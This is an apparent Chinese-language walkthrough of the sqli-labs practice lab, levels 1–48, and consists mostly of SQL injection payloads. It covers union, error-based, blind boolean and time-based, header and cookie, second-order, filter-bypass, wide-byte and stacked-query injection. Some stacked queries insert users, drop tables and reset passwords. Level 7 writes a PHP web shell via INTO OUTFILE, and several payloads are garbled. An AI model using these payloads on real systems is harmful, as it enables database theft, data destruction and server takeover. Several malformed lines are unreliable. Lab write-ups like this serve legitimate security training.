sqlilab题解&&总结

闭合报错

  • 1
    2
    ?id=1’
    ?id=1”
    • 如果都报错,则为整形闭合

      尝试?id=1–+

      • 无报错则整形闭合。报错则整形加括号
    • 如果单引号报错,双引号不报错

      尝试?id=1’–+

      • 无报错则单引号闭合。报错则单引号加括号
    • 如果单引号不报错,双引号报错。
      尝试?id=1”–+

      • 无报错则双引号闭合。报错则双引号加括号。

sqlilab

1(联合注入)

第一关反馈数字为字符型

注入需要?id=1’

2

  • image-20250303143820028

    image-20250303143841256

    第二关无数字反馈 为数字型

    注入需要?id=1

    1
    2
    3
    4
    5
    6
    ?id=1 order by 3
    ?id=-1 union select 1,2,3
    ?id=-1 union select 1,database(),version()
    ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
    ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
    ?id=-1 union select 1,2,group_concat(username ,id , password) from users

    一步一步来

  • image-20250303144100313

    分段

  • image-20250303144127923

    爆出数据所在位置

  • image-20250303144243223

  • image-20250303144258358

  • image-20250303144321219

  • image-20250303144339430

3

  • image-20250303144432279

    测试出现括号, 且为字符型

  • 1
    2
    3
    4
    5
    6
    7
    ?id=1')--+(闭合括号)
    ?id=1') order by 3--+
    ?id=-1') union select 1,2,3--+
    ?id=-1') union select 1,database(),version()--+
    ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
    ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
    ?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

    一步一步来

4

  • image-20250303151047094

    单引号无报错

    使用双引号测试

  • image-20250303151140123

    1
    2
    3
    4
    5
    6
    ?id=1") order by 3--+(使用双引号测试)(闭合括号)
    ?id=-1") union select 1,2,3--+
    ?id=-1") union select 1,database(),version()--+
    ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
    ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
    ?id=-1") union select 1,2,group_concat(username ,id , password) from users--+

5(报错注入)

6

  • image-20250303153000044

    使用双引号

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    ?id=1"
    
    ?id=1" and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+
    
    
    ?id=1" and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ 
    
    ?id=1"and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
    
    ?id=1"and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) --+

7(文件写入/布尔盲注)

  • image-20250303205727884

    测试(题目要求使用文件上传)

  • image-20250303210120634

    写入文件(仿照木马病毒)

  • 先判断断点

    image-20250303211010525

    有3个断点

  • 使用木马病毒的语句

    http://sqli-labs-master:82/Less-7/?id=1'))union select 1,’‘,3 into outfile “D:\software\phpstudy_pro\WWW\sqli-labs-master\Less-7\shell.php”– qwe

    (在文件夹less-7中出现shell.php文件 内容为以及目标服务器的账户密码)

  • 可以读取php代码,配合菜刀可以进入服务器

8(布尔盲注)

  • image-20250304125052559

    ’ 闭合(只显示正确,错误页面,布尔盲注)

    1

    ?id=1’and length((select database()))>=5–+(猜库的长度)

    ?id=1’ and mid(database(),1,1)=‘s’–+(猜库的名称)

    (?id=1’ and ascii(substr((select database()),1,1))=115–+ 115=’s’)

    ?id=1’ and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=‘security’),1,1))>=101–+

    (同理猜解出表名,列名)

    ?id=1’ and ascii(substr((select group_concat(username,password) from users),1,1))=68–+(获取数据)

    1

    image-20250304130318563

9(时间注入)

  • 无论输入什么都没有报错

    使用时间注入

  • 判断类型

    image-20250304130800212

    ?id=1’ and if(1=1,sleep(5),1)–+

    页面有时间延迟,则为真

  • 剩余步骤同布尔盲注

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    ?id=1' and if(1=1,sleep(5),1)--+
    判断参数构造。
    
    ?id=1'and if(length((select database()))>9,sleep(5),1)--+
    判断数据库名长度
     
    ?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+
    逐一判断数据库字符
    ?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+
    判断所有表名长度
     
    ?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+
    逐一判断表名
    ?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+
    判断所有字段名的长度
    
    ?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+
    逐一判断字段名。
    ?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+
    判断字段内容长度
     
    ?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
    逐一检测内容。

10

  • image-20250304131058553

    ?id=1” and if(1=1,sleep(5),1)–+

    双引号闭合

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    ?id=1" and if(1=1,sleep(5),1)--+
    判断参数构造。
    
    ?id=1"and if(length((select database()))>9,sleep(5),1)--+
    判断数据库名长度
     
    ?id=1"and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+
    逐一判断数据库字符
    ?id=1"and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+
    判断所有表名长度
     
    ?id=1"and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+
    逐一判断表名
    ?id=1"and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+
    判断所有字段名的长度
    
    ?id=1"and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+
    逐一判断字段名。
    ?id=1" and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+
    判断字段内容长度
     
    ?id=1" and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
    逐一检测内容。

11(post注入)

  • image-20250304131416520

    写入1‘出现报错

  • 抓包(相当于get,直接联合注入)

    image-20250304133349636

    也可在username对话框直接写联合注入代码

    1
    2
    3
    4
    5
    6
    7
    1'or 1=1#
    1' order by 3#
    -1'  union select 1,2#
    -1' union select ,version,database(,version#
    -1'  union select 1,group_concat(table_name) from information_schema.tables where table_schema='security#
    -1'  union select 1,group_concat(column_name) from information_schema.columns where table_name='users#
    -1'  union select 1,group_concat(username ,id , password) from user#

12

写入1”出现报错

image-20250304134337329

使用 “)进行闭合

1
2
3
4
5
6
7
1" )or 1=1#
1" ) order by 3#
-1" ) union select 1,2#
-1" ) union select ,version,database(,version#
-1" ) union select 1,group_concat(table_name) from information_schema.tables where table_schema='security#
-1" ) union select 1,group_concat(column_name) from information_schema.columns where table_name='users#
-1" ) union select 1,group_concat(username ,id , password) from user#

13

写入1‘出现报错

image-20250304134416401

使用 ‘)进行闭合

1
2
3
4
5
6
7
1' )or 1=1#
1' ) order by 3#
-1' ) union select 1,2#
-1' ) union select ,version,database(,version#
-1' ) union select 1,group_concat(table_name) from information_schema.tables where table_schema='security#
-1' ) union select 1,group_concat(column_name) from information_schema.columns where table_name='users#
-1' ) union select 1,group_concat(username ,id , password) from user#

14

写入1”出现报错

image-20250304134458284

只使用双引号

1
2
3
4
5
6
7
1"or 1=1#
1" order by 3#
-1" union select 1,2#
-1" union select ,version,database(,version#
-1" union select 1,group_concat(table_name) from information_schema.tables where table_schema='security#
-1" union select 1,group_concat(column_name) from information_schema.columns where table_name='users#
-1" union select 1,group_concat(username ,id , password) from user#

15(post布尔注入)

  • image-20250304202410979

    1’ or 1=1#

    无反馈,使用布尔盲注

    uname= 相关代码 &passwd=&submit=Submit

    1
    2
    3
    4
    5
    6
    7
    8
    9
    1' or 1=1#(判断闭合符号)
    1' or length(database())>7#(猜数据库长度)
    1' or ascii(substr(database(),1,1))>114#(猜数据库名字)
    1' or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5#(猜表名长度)
    1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>116#(猜表名名字)
    1' or (length((select column_name from information_schema.columns where table_schema=database() and table_name="users"limit 0,1)))>1#(猜列名长度)
    1' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),1,1))>116#(猜列名名字)
    1' or length((select password from users limit 0,1))>3#(猜数据长度)
    1' or ascii(substr((select password from users limit 0,1),1,1))>67#(猜数据名字)

16

  • image-20250304212902595

    双引号+括号进行闭合

  • uname= 相关代码 &passwd=&submit=Submit

    1
    2
    3
    4
    5
    6
    7
    8
    9
    1") or 1=1#(判断闭合符号)
    1") or length(database())>7#(猜数据库长度)
    1") or ascii(substr(database(),1,1))>114#(猜数据库名字)
    1") or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5#(猜表名长度)
    1") or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>116#(猜表名名字)
    1") or (length((select column_name from information_schema.columns where table_schema=database() and table_name="users"limit 0,1)))>1#(猜列名长度)
    1") or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),1,1))>116#(猜列名名字)
    1") or length((select password from users limit 0,1))>3#(猜数据长度)
    1") or ascii(substr((select password from users limit 0,1),1,1))>67#(猜数据名字)

17

  • 题目提示修改密码
    抓包之后还是post型

    所以使用passd进行测试

  • 根据源代码

    image-20250304220832488

    表明:uname只能是库名

    ​ 使用passd注入

  • image-20250304220949627

    uname=admin

    passd=1’ 出现报错

    使用报错注入

  • image-20250304221231893

    1
    2
    3
    4
    5
    6
    7
    uname=admin
    
    1' or 1=1#
    1' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)#
    1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) #
    1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
    1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1)#

18

  • image-20250305185702069

    提示user agent

    image-20250305185740234

    源代码将uname&passwd都使用check_input函数

  • 注入ua

    image-20250305190437037

    提示闭合 为单引号

  • 报错注入

    1
    2
    3
    4
    5
    6
    7
    1' and updatexml(1,concat(0x7e,(select database())),1) and '1' ='1#
     
    1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) and '1' ='1#
    
    1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1' ='1#
    
    1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) and '1' ='1#

19

  • image-20250305194359527

    提示referer

    1
    2
    3
    4
    5
    6
    7
    1' and updatexml(1,concat(0x7e,(select database())),1) and '1' ='1#
     
    1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) and '1' ='1#
    
    1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1' ='1#
    
    1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) and '1' ='1#

20(cookie)

  • image-20250305194725524

    出现cookie

  • 登录后在刷新抓包

    image-20250305195520723

    测试单引号闭合

    使用联合注入或者报错注入

    1
    2
    3
    4
    5
    6
    7
    uname=admin' 1' and updatexml(1,concat(0x7e,(select database())),1) and '1' ='1#
     
    uname=admin'1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) and '1' ='1#
    
    uname=admin'1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1' ='1#
    
    uname=admin'1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) and '1' ='1#

21(cookie+base64)

  • image-20250305200559293

    出现base64编码

    闭合为单引号(‘)

  • 解码后使用

    联合注入或者报错注入

22

  • image-20250305200559293

    出现base64编码

    闭合为双引号(“)

  • 解码后使用

    联合注入或者报错注入

23(只联合)

image-20250305202555964

本题过滤了#和–( 不能注释后面的字符)

只能使用联合

因为只有联合使用OR ‘1’=’1可以代替注释符

但是使用报错注入的话,and ‘1’=’1不能替代注释符

  • image-20250305202437014

    为单引号闭合

    1
    2
    3
    4
    5
    6
    7
    8
    9
    id=1' or '1' ='1
    
    id=-1' union select 1, database(),version() or '1' = '1
    
    id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security'),3 or '1'='1
    
    id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security' and table_name=‘users’ ),3 or '1'='1
    
    id=-1' union select 1,(select group_concat(password,“-”,username) from users),3 or '1'='1

24(二次注入)

  • 注册

    账号admin’ #

    密码111

  • 再登录账号

  • image-20250305205830652

    修改密码

    111 222 222

    但是此时的admin’ #密码并没有修改(因为账户为admin‘ # 屏蔽了后面的密码修改代码)

    所以成功绕过

    image-20250305210131665

    可以登入数据库

25(双写)

  • image-20250305210241340

    注释了or和and

    限制了联合和报错的order by | and xxxx

    重复注入(oorr anandd)只过滤一个

    1
    2
    3
    4
    5
    6
    7
    8
    9
    ?id=1'
    
    ?id=1' anandd updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+
    
    ?id=1' anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ 
    
    ?id=1'anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
    
    ?id=1'anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) --+
    1
    2
    3
    4
    5
    6
    ?id=1' oorrder by 3
    ?id=-1' union select 1,2,3
    ?id=-1' union select 1,database(),version()
    ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
    ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
    ?id=-1' union select 1,2,group_concat(username ,id , password) from users

25a

  • image-20250306190129999

    无反馈,为数字注入

    1
    2
    3
    4
    5
    6
    7
    8
    9
    ?id=1
    
    ?id=1 anandd updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+
    
    ?id=1 anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ 
    
    ?id=1anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
    
    ?id=1anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) --+
    1
    2
    3
    4
    5
    6
    ?id=1 oorrder by 3
    ?id=-1 union select 1,2,3
    ?id=-1 union select 1,database(),version()
    ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
    ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
    ?id=-1 union select 1,2,group_concat(username ,id , password) from users

26(双写、注释符绕过)

  • image-20250306190428247

    过滤了逻辑运算符,注释符以及空格

    双写绕过逻 辑运算符或者使&&和||替换

    空格过滤:

    1
    2
    3
    4
    5
    6
    7
    %09 Tab键(水平)
    %0a 新建一行
    %0c 新的一页
    %0d return 键
    %0b Tab键(垂直)
    %a0 空格
    () 绕过

    注释符绕过:

    ;%00

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    ?id=1'
    
    ?id=1'anandd(updatexml(1,concat(0x7e,database()),0x7e),1);%00
    
    ?id=1'anandd(updatexml(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1));%00
    
    ?id=1'anandd(updatexml(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users')),1));%00
    显示不全(因为显示的字段太长,有限制)
    
    ?id=1'anandd(updatexml(1,mid((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users')),40,100),1));%00
    (加mid由于,其可以使用更加简洁的输出想要的字段)
    ?id=1'anandd(updatexml(1,(select(group_concat(username,0x7e,passwoorrd))from(users)),1));%00

    image-20250306193603285

26a

  • image-20250306193957125

    无显示报错信息

    不能使用报错注入,使用盲注/联合

    (但是联合括号太多了)

  • 1
    2
    3
    4
    5
    
    ?id=1')anandd(length(database())=8);%00
    ?id=1')anandd(ascii(substr(database(),1,1))=115);%00
    ?id=1')anandd(length((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))=29);%00
    ?id=1')anandd(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1,1))=101);%00

27

  • 确定以单引号闭合

    image-20250306200303124

    而且禁用了两个关键词

    UNION & SELECT

  • 有报错可以使用报错注入,可以使用大小写绕过

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    ?id=1'and(updatexml(1,concat(0x7e,database()),0x7e),1);%00
    
    ?id=1'and(updatexml(1,(SELect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1));%00
    
    ?id=1'and(updatexml(1,(SELect(group_concat(column_name))from(information_schema.columns)where(table_name='users')),1));%00
    显示不全(因为显示的字段太长,有限制)
    
    ?id=1'and(updatexml(1,mid((SELect(group_concat(column_name))from(information_schema.columns)where(table_name='users')),40,100),1));%00
    (加mid由于,其可以使用更加简洁的输出想要的字段)
    ?id=1'and(updatexml(1,(SELect(group_concat(username,0x7e,password))from(users)),1));%00

27a

  • 双引号注入

但是无报错,所以使用盲注

1
2
3
4
5

?id=1"and(length(database())=8);%00
?id=1"and(ascii(substr(database(),1,1))=115);%00
?id=1"and(length((SELect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))=29);%00
?id=1"and(ascii(substr((SELect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1,1))=101);%00

28

image-20250306203746685

过滤空格和注释符

  • 单引号+括号闭合

    无回显,使用盲注/联合

  • 1
    2
    3
    4
    ?id=1')and(length(database())=8);%00
    ?id=1')and(ascii(substr(database(),1,1))=115);%00
    ?id=1')and(length((SELect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))=29);%00
    ?id=1')and(ascii(substr((SELect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1,1))=101);%00

28a

  • image-20250306203625655

    只过滤union select

    双写绕过

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    ?id=1');%00  
    
    ?id=1') order by 3;%00  
    
    ?id=-1') ununion selection select 1,2,3;%00  
    
    ?id=-1') ununion selection select 1,database(),version();%00 
    
    ?id=-1') ununion selection select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security';%00  
    
    ?id=-1') ununion selection select 1,2,group_concat(column_name) from information_schema.columns where table_name='users';%00  
    
    ?id=-1') ununion selection select 1,2,group_concat(username,id,password) from users;%00

    或者布尔注入

    1
    同上题

29HPP http参数污染(双服务器)

  • 1
    2
    3
    4
    5
    6
    id=1' order by 3--+(使用双引号测试)(闭合括号)
    ?id=-1' union select 1,2,3--+
    ?id=-1' union select 1,database(),version()--+
    ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
    ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
    ?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

重点

参数污染:提交相同参数,不同的处理方式

1
2
?id=123
cookie: id=123
1
?id=123&id=13555

对两个id的传参处理不一样

image-20250306211048605

30

  • 1
    2
    3
    4
    5
    6
    id=1" order by 3--+(使用双引号测试)(闭合括号)
    ?id=-1" union select 1,2,3--+
    ?id=-1" union select 1,database(),version()--+
    ?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
    ?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
    ?id=-1" union select 1,2,group_concat(username ,id , password) from users--+

31

  • 1
    2
    3
    4
    5
    6
    id=1") order by 3--+(使用双引号测试)(闭合括号)
    ?id=-1") union select 1,2,3--+
    ?id=-1") union select 1,database(),version()--+
    ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
    ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
    ?id=-1") union select 1,2,group_concat(username ,id , password) from users--+

32(转义 宽字节注入)

  • image-20250306212036698

    (preg_replace预定义字符之前添加反斜杠)

    此函数将 “ ’ 转化

    加%df+单引号 ,相当于两个字符—>表示汉字

    使得单引号逃逸出来

    1
    2
    3
    4
    5
    6
    7
    8
    
    ?id=-1%df'union select 1,database(),3 --+
     
    ?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+     爆表
     
    ?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+   爆字段
    使用16进制
    ?id=-1%df' union select 1,group_concat(password,username),3 from users--+

33

双引号闭合

  • 1
    2
    3
    4
    5
    6
    7
    ?id=-1%df"union select 1,database(),3 --+
     
    ?id=-1%df" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+     爆表
     
    ?id=-1%df" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+   爆字段
    使用16进制
    ?id=-1%df" union select 1,group_concat(password,username),3 from users--+

34(post+宽字节)

  • image-20250306213953154

    表单类型的宽字节

    报错注入

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    1%df'
    
    1%df' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+
    
    
    1%df' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ 
    
    1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
    
    1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1%df'

35

  • 数字型+函数addslashes()

    (addslashes() 是 PHP 中的一个函数,作用是 在字符串中特殊字符前添加反斜杠(\)进行转义,以防止 SQL 注入或字符串解析错误。)

    由于是数字型所以无需要宽字节注入

    直接报错注入

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    
    ?id=1 
    
    ?id=1  and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+
    
    
    ?id=1  and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ 
    
    ?id=1 and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
    
    ?id=1 and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1%df'

36

  • 单引号+宽字节+mysql_real_escape_string()函数转义

  • mysql_real_escape_string() 是 PHP 中的一个函数,主要用于对字符串中的特殊字符进行转义,以防止 SQL 注入

  • 使用报错注入即可

  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    1%df'
    
    1%df' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+
    
    
    1%df' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ 
    
    1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
    
    1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1%df'

37

  • 单引号+post+宽字节+MySQL_real_escape_string

  • 同34

  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    1%df'
    
    1%df' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+
    
    
    1%df' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select  group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ 
    
    1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
    
    1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1%df'

38(堆叠注入)

堆叠/报错/联合

  • 单引号+mysqli_multi_query函数

    mysqli_multi_query函数支持多条sql语句输出

  • 1
    2
    3
    4
    5
    6
    ?id=1';insert into users(id,username,password) values('18','bx','2328');--+
    #id=18的数据修改
    改为账户:bx     密码为2328
    
    ?id=18
    可查看到18的账户密码已被我们所修改
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    ?id=1';insert into users(id,username,password) values('18','bx','2328');--+
    注册用户
    ?id=1';create table xxx like users;--+
    创建xxx表
    ?id=1';INSERT INTO xxx SELECT * FROM users;--+
    插入xxx数据
    ?id=1';DELETE FROM xxx;--+
    删除xxx数据
    ?id=1';DROP TABLE xxx;--+
    删除xxx表
    ?id=1';updata users set password='12345'where username='xxx'
    修改xxx账户的密码

39

堆叠/报错/联合

  • 数字型+mysqli_multi_query函数

    同上

  • 1
    2
    3
    4
    5
    6
    ?id=1;insert into users(id,username,password) values('18','bx','2328');--+
    #id=18的数据修改
    改为账户:bx     密码为2328
    
    ?id=18
    可查看到18的账户密码已被我们所修改

40

堆叠/联合

  • 无报错+单引号+括号

  • 1
    2
    3
    4
    5
    6
    ?id=1');insert into users(id,username,password) values('18','bx','2328');--+
    #id=18的数据修改
    改为账户:bx     密码为2328
    
    ?id=18
    可查看到18的账户密码已被我们所修改

41

堆叠/联合

  • 无报错+数字

  • 1
    2
    3
    4
    5
    6
    ?id=1');insert into users(id,username,password) values('18','bx','2328');--+
    #id=18的数据修改
    改为账户:bx     密码为2328
    
    ?id=18
    可查看到18的账户密码已被我们所修改

42(先堆叠,再二次注入)

  • 账户进行转义,密码没有,但是存在堆叠注入的函数

    (不是gbk编码所以不能使用宽字节)

    使用堆叠注入

    单引号

    1
    2
    3
    4
    login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login
    将id=39
    账号:less30
    密码:123456

43

  • image-20250307152806286

    为单引号+括号

  • 1
    2
    3
    4
    login_user=1&login_password=1');insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login
    将id=39
    账号:less30
    密码:123456

44

  • 无报错

  • 测试

    1
    2
    3
    4
    5
    6
    单引号测试成功
    login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--
    
    将id=39
    账号:less30
    密码:123456

45

  • 无报错

  • 测试

    单引号测试不成功

    1
    2
    3
    4
    5
    6
    单引号+括号 测试成功
    login_user=1&login_password=1');insert into users(id,username,password) values ('39','less30','123456')--
    
    将id=39
    账号:less30
    密码:123456

46

  • image-20250307153359198

    根据提示输入?sort=1

  • image-20250307153423526
  • 出现表格

  • 寻找闭合

    数字型

  • 报错注入

    1
    ?sort=1 and (updatexml(1,concat(0x7c,(select group_concat(password,id,username) from users),0x7c),1))

47

  • 同上

    闭合为单引号

    1
    ?sort=1' and (updatexml(1,concat(0x7c,(select group_concat(password,id,username) from users),0x7c),1))

48(order by 下的布尔/时间)

  • 无报错

  • 布尔/时间

    布尔

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    ?sort=rand((ascii(mid((select database()),1,1)))>65)
    
    sord=rand and length(database())>7#(猜数据库长度)
    sord=rand and ascii(substr(database(),1,1))>114#(猜数据库名字)
    sord=rand and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5#(猜表名长度)
    sord=rand and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>116#(猜表名名字)
    sord=rand and (length((select column_name from information_schema.columns where table_schema=database() and table_name="users"limit 0,1)))>1#(猜列名长度)
    sord=rand and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),1,1))>116#(猜列名名字)
    sord=rand and length((select password from users limit 0,1))>3#(猜数据长度)
    sord=rand and ascii(substr((select password from users limit 0,1),1,1))>67#(猜数据名字)

    时间:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    ?sort=1'and if(length((select database()))>9,sleep(5),1)--+
    判断数据库名长度
     
